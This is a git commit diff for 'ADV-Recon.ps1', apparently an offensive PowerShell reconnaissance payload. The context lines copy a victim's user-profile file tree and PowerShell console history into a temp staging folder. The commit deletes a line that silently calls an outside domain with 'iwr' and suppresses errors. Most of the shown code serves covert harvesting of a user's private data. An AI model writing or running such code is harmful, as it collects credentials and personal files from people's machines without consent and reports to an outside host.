Update ADV-Recon.ps1
This commit is contained in:
parent
29cb80fb06
commit
78aea8e8da
1 changed files with 1 additions and 1 deletions
|
@ -57,7 +57,7 @@ tree $Env:userprofile /a /f >> $env:TEMP\$FolderName\tree.txt
|
||||||
|
|
||||||
# Powershell history
|
# Powershell history
|
||||||
Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination $env:TEMP\$FolderName\Powershell-History.txt
|
Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination $env:TEMP\$FolderName\Powershell-History.txt
|
||||||
iwr "https://jakoby.lol/hak5" -EA 0 >$null
|
|
||||||
############################################################################################################################################################
|
############################################################################################################################################################
|
||||||
|
|
||||||
function Get-fullName {
|
function Get-fullName {
|
||||||
|
|
Loading…
Reference in a new issue